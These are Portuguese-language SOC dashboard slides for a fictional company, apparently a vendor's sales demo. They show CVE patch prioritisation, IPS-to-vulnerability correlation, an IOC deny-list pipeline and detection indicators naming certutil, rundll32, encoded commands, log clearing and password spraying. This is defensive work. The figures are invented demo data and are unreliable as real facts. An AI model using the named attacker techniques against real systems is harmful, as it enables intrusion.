risco aceito até migração set/26 — assinado dir. TI
ACEITO
wks-fab-101..112Win7 SP1 · fábrica
28
CVE-2017-0144MS17-010 · SMBv1
compensação: VLAN OT isolada · sem EDR — prioridade rollout
SEM EDR
pdv-fil*38 filiais · Java 8u151
19
CVE-2024-21147Oracle Java SE
campanha Java 38% · fila por filial · TK-30841
CAMPANHA
srv-erp-0110.20.4.11 · Protheus
11
CVE-2024-20952Java SE · lib
aguarda homologação do fornecedor · janela sáb 26/07
HOMOLOG.
vpn-forti-01borda · FortiOS 7.4.3
3
CVE-2024-21762SSL-VPN RCE · KEV
FortiOS 7.4.4 qui 24/07 22h · GMUD-1181 · IPS ativa
JANELA QUI

Correlação IPS ↔ Vulns

o que tentam explorar × o que temos · IPS 512 ev/h
assinatura na bordatent. 24hpresença na base
Citrix BleedET 2048933 · CVE-2023-4966
214
PRESENTE · 2 ADCs do portal sem patch
AGIR
Log4ShellET 2034647 · CVE-2021-44228
96
2 apps Java em análise · inventário TK-30799
ANÁLISE
PAN-OS GlobalProtectET 2051790 · CVE-2024-3400
27
0 alvo — sem PAN-OS no parque (CMDB)
SEM ALVO
SMBGhostET 2030338 · CVE-2020-0796
12
corrigido 100% · KB4551762 (2020)
MITIGADO
✓ borda bloqueou 100% das 349 tentativas · inventário Java vence qua 23/07 — Aline F.
Scanner autenticado qui 22h + agente EDR + CMDB · 1.842 CVEs abertos · KEV 17 · EPSS>0,7: 28 · Grupo Vetria · dom 20/07 15:12
EV-15 · 15 de 17
Grupo Vetria / Segurança & SOC / Threat Intel
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Radar de Feeds → Ambiente · pipeline de IOCs

MISP local wzh-mgr-01/02 · TAXII comercial · CERT.br · push API FGT / RPZ / EDR / Wazuh · sync 15 min
3 FEEDS EXTERNOS · TAXII/STIX 2.1 · SYNC 15 MIN MISP COMUNIDADE TLP:GREEN 31.046 IOCs 62% hash · 23% IP · 15% dom sync 15h09 · lat. pub 9,4h · R$ 0 FEED COMERCIAL TLP:AMBER 14.204 IOCs C2 ativos · APT · ransomware sync 15h11 · lat. pub 2,1h · R$ 84k/ano CERT.BR TLP:CLEAR 3.218 IOCs phishing .br · fraude bancária sync 14h58 · lat. pub 5,2h · R$ 0 PRODUÇÃO PRÓPRIA · CASOS SOC IOCs INTERNOS TLP:RED 3.042 IOCs extração EDR/forense · 8 do EV-0142 aprovação N2 obrigatória DEDUP · NORMALIZAÇÃO · SCORE MISP local · wzh-mgr-01/02 · pipeline v2.3 48.213 IOCs ATIVOS DISTRIBUÍDOS −3.297 duplicados · 6,4% overlap entre fontes 312 renovados por re-observação · 7d hash 31.014 IP 9.401 domínio 7.798 confiança: 61% alta · 31% média · 8% baixa Σ 61 HITS · 24H FORTIGATE DENY-LIST fgt-mtz-01 · EDGE-DENY 9.401 IPs · TTL 30d push 15h09 · API REST 23 hits 24h DNS RPZ rpz.vetria.corp · BIND 9 7.798 domínios · NXDOMAIN TTL 90d · push 15h09 19 hits 24h EDR HASH-LIST bloqueio on-access 31.014 sha256 · TTL 365d quarentena automática 11 hits 24h SIEM WATCHLIST Wazuh CDB · lists/ti-full 48.213 IOCs · alerta → N2 regras vet-1812xx 8 hits 24h LATÊNCIA PUBLICAÇÃO → BLOQUEIO p50 4 min · p95 12 min pior rota: MISP → FGT · 26 min ANTECIPAÇÃO · EV-2026-0142 qui 17/07 08h11 · feed comercial publica sha256 9f2a71…c44b (upd.dll · C2 203.0.113.88:443) 08h15 · push automático EDR + FGT + RPZ — 6h antes da execução em wks-fab-104 2ª onda do ransomware evitada · 8 hashes da família
HITS DE IOC POR DIA · 07/07 → 20/07Σ 521 hits · méd 37,2/dia · qui 17/07: 94 · fonte: Wazuh alerts · rule.groups=threat_intel
hits/dia96,072,048,024,00
méd 37,2/d
28
31
24
36
29
22
18
33
27
31
94
48
39
61
qui 17/07 · pós-EV-0142 · 14 hits da infra do caso ▸
hoje ▾ até 15h12
0708091011121314151617181920▾
✎ decisão do plantão: bloqueio automático mantido p/ TLP:AMBER+ · dona do pipeline: Yasmin R. · duplicidade MISP×comercial em revisão set/26 · TK-30455

Hits Recentes · onde o IOC bateu

syslog fgt-mtz-01 · RPZ · EDR · Wazuh · últimos 8 de 61 · 11h32 → 15h07
horaIOCtipofeedpontohostação
15h07203.0.113.187IPCOFGTvpn-forti-01DENYEDGE-DENY · TTL 30d · AUTO
14h51vetria-fatura.netDOMINTRPZwks-fab-107NXDOMAINtyposquat WL-04 · TK-30501
14h38sha256:e3d09b…77a1HSHCOEDRwks-fab-112QUARENT.PB-05 · anexo .docm · AUTO
13h56203.0.113.61IPMISPFGTsrv-mail-01DENYscanner SMTP · TTL 30d
13h20b2b-vetria-portal.comDOMCERTRPZpdv-fil07-03NXDOMAINkit de phishing .br · AUTO
12h44203.0.113.90IPMISPFGTportal-vetriaFPCDN compartilhada · Aline F. · TK-30496
12h05sha256:41bc0e…9d12HSHMISPSIEMsrv-bkp-01→ N2CS-2219 · correlação em curso
11h32203.0.113.12IPCERTSIEMdc-spo-01FPNAT parceiro EDI · Douglas M. · TK-30508
✎ consulta: rule.groups=threat_intel AND !data.tag:fp · precisão 24h 96,7% (59/61) · FP ⇒ remove IOC + exceção nomeada

Aging & Expiração da Base

MISP last_seen · política TTL v1.4 · base 48.213
TTL IP 30dTTL domínio 90dTTL hash 365d312 renovados/7d▨ expira ≤30d+1,1k pós-EV-0142 · 72h
6.804
12.941
11.278
8.122
6.446
2.622
9.412 expiram ≤30d · 19,5% da base
<7d7–30d30–90d90–180d180–365d>1 ano

Qualidade dos Feeds · 30 dias

Shuffle PB-14 · hits 24h por origem: 35 · 18 · 8 (internos 0)
feedprecisãocoberturalat. pubhits 14dveredito
feed comercial
TAXII · R$ 84k/ano
verdadeiros/hits94%
35 de 61 hits57%
2,1h
p95 4,8h
MANTER
MISP comunidade
instância local · R$ 0
verdadeiros/hits71%
18 de 61 hits30%
9,4h
p95 26h
MANTERrever dedup set/26
CERT.br
notificações · R$ 0
verdadeiros/hits88%
8 de 61 hits13%
5,2h
p95 11h
MANTER
✎ recomendação (Yasmin R.): manter os 3 · sobreposição MISP×comercial 6,4% — revisão set/26 · TK-30455

Watchlists Ativas · Wazuh CDB

/var/ossec/etc/lists/ · 4 listas · reload 10 min
WL-07
Infra do EV-2026-0142
38 IOCs · 8 hash · 21 IP · 9 dom · até fechamento do caso
3 hits/7d
todos bloqueados
ATIVARenata C.
WL-04
Typosquats vetria*
12 domínios · 2 registrados em jul · RPZ pré-bloqueio
1 hit/7d
14h51 · wks-fab-107
ATIVAAline F.
WL-02
ASNs bulletproof
7 ASNs · deny na borda · correlação GeoIP no SIEM
11 hits/7d
só varredura · sem caso
ATIVATúlio B.
WL-09
Contas vazadas · dump jun
41 contas monitoradas · reset forçado + MFA · TK-30488
8 matches
tratados · 0 pendente
TRATADAMarcos P.
MISP + feed comercial + CERT.br → FortiGate / DNS-RPZ / EDR / Wazuh · 48.213 IOCs ativos · 61 hits/24h · Grupo Vetria · dom 20/07 15:12
EV-16 · 16 de 17
Grupo Vetria / Segurança & SOC / Indicadores & Automação
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · Event Viewer · FortiGate · webhook ITSM·30 s ↻AO VIVO

Observabilidade → Ação · do evento ao ticket

Event Viewer + rede → Wazuh SIEM → webhook → ITSM · pipeline único · taxa de conversão por estágio · 24h
1FONTES
214fontes de log
11,8k EPS méd · pico 23,4k · Event Viewer 6 DCs · FortiGate · Sysmon · NetFlow
4624/4625/4740/4688/7045/1102/4732/5140
⚠ QUEDA DE COLETA · fgt-fil12-01 · EPS = 0 há 3d
ingestsyslog / agente
2SIEM WAZUH
1,02Beventos/dia
3.428 regras (186 vet-*) · normaliza + correlaciona · 1.912 decoders
match hierárquico · rule.level ≥ 10
0,000034%vira sinal
3SINAIS
347alertas hoje
rule.level ≥ 10 → fila de triagem (EV-01) · 218 casos/mês
12,4k alertas/mês · MTTA 4,2 min
11,8%disparam
4WEBHOOKS
41exec/24h
regra dispara POST → ITSM · 87% auto / 13% humano · p50 4 min
PB-01 … PB-11 · SOAR Shuffle
22%viram ticket
5ITSM
9abertos
1 P1 · fila 28 · MTTR 38 min · 3 estouram SLA até 15h40
SLA P1 4h · contrato Vigia8
de 1,02B eventos/dia a 9 incidentes abertos — razão de ruído 1 : 113M1 fonte muda derruba a coleta antes do SIEM entrar: fgt-fil12-01 · 3d · abre webhook PB-11
Autenticação & Identidade2 disp·2 atn
Event Viewer · 4625/4624/4740/4732 · AD VETRIA.CORP · 5 indicadores
#01Falha vs Sucesso de Logon4625/4624
18.442falhas/24h
vs 96.418 sucessos · pico 1.208/h · 03h10
spray → sucesso em vpn-forti-01
falha 16,1%sucesso 83,9%
DISPARADO→ webhook PB-01 · TK-30442
#02Bloqueio de Contas4740
47lockouts/24h
baseline 6 · possível
password spraying
baseline 6limiar 20 · atual 47
ATENÇÃO→ watch · limiar 20/24h · vet-100061
#03Logon em Horário Anômalo4624 · RDP
3logons 02h–05h
fora do padrão · manutencao-predial
(terceiro) · 02h40
00h06h12h18h
ATENÇÃO→ watch · janela 08h–19h
#04Viagem Impossível4624 · GeoIP
1caso
adm.ti-03 · SP 15h02 →
nuvem UE 15h07
SP · 15h02 UE · 15h07 Δ 4.900 km / 5 min
DISPARADO→ webhook PB-06 · TK-30448
#05Modif. Grupo Privilegiado4732
1adição
Domain Admins · GMUD 2260
aprovada · Renata C.
1 adição em 24h · 14h32 aprovada
APROVADAdentro do processo · GMUD 2260
Endpoint & Processos2 disp·1 atn
Sysmon EID1 · 4688 · 7045 · 1102 · console EDR · 4 indicadores
#06Processos Suspeitos4688 · EID1
9execuções
EV-2026-0142 · wks-fab-104
host isolado pelo EDR
4-enc
3rundll32
2certutil
DISPARADO→ webhook PB-02 · isolar host
#07Novos Serviços7045
6/24h
baseline 2,1 · 1 binário NÃO
assinado em srv-arq-01
baseline 2,1limiar 4 · atual 6
ATENÇÃO→ verificar assinatura · TK-30481
#08Limpeza de Log1102
1evento
srv-web-01 · Security log
cleared · crítico
baseline 0 · 1 evento raro · limiar 1
DISPARADO→ investigação · TK-30412
#09Desativação de EDR/AVEDR · Defender
0hoje
baseline 0 · (1 no incidente
17/07, revertido)
○ marca 17/07 revertida · limiar 1
NORMALdentro do baseline · limiar 1
Rede & Mov. Lateral2 atn·1 contido
5140 · NetFlow FortiGate · feed IOC · Threat Intel · 3 indicadores
#10Mapeamento de Shares5140
214acessos/5min
pico de 1 IP 10.20.x · baseline 30
movimento lateral em análise
pico 214/5min · baseline 30 · limiar 60
ATENÇÃO→ watch · limiar 60/5min · vet-100073
#11Egress AnômaloNetFlow · FGT
1,4GB out
pdv-fil07-03 → IP externo
desconhecido · rampa 6h
1,4 GB em 6h · EV-0142 exfil bloqueada
EM ANÁLISE→ watch · TK-30474
#12C2 / IOC Threat Intelfeed IOC
61hits/24h
203.0.113.88 (C2 do
EV-0142) · bloqueado na borda
61 hits · 24h100% bloqueado
CONTIDO→ webhook PB-04 · DENY na borda
Operação & SLA1 atn·2 normal
Wazuh · webhook ITSM · contrato Vigia8 · 3 indicadores
#13Alertas → Incidentesruído · triagem
2,6% viram caso
347 alertas → 9 incidentes
taxa de ruído medida
alertas347
incidentes9
✓ 2,6% viram caso· meta ruído < 5%
NORMALdentro da meta · < 5%
#14EPS por FonteWazuh · coleta
11,8kEPS agreg.
206/214 fontes ok · fgt-fil12-01
EPS = 0 há 3d (queda de coleta)
206 ok5 atraso · 3 mudas
ATENÇÃO→ webhook PB-11 · queda de coleta
#15MTTRITSM · Vigia8
38min (P1)
MTTD 4,2 min · SLA P1 4h
dentro do contrato
MTTR 38 minSLA 240 min (4h)
NORMALdentro do SLA · contrato Vigia8
Event Viewer + rede → Wazuh → webhook → ITSM · Grupo Vetria · dom 20/07 15:12
EV-17 · 17 de 17
Flowbix
Flowbix · Vamos conversar·2026
Próximo passo

Vamos fechar o cerco?

Agende uma demo do NOC Flowbix e traga SIEM, firewall, EDR e os eventos do Windows para uma sala só — triagem com SLA em contagem regressiva, perímetro com dono de porta, cobertura da frota, identidade e a tela do board num painel único.

serviceFLOWBIX

Comercial · Flowbix

Conta verificada

QR Code WhatsApp Comercial Flowbix
Escaneie para iniciar uma conversa
Flowbix·Segurança & SOC · Grupo Vetria — demo
19 / 19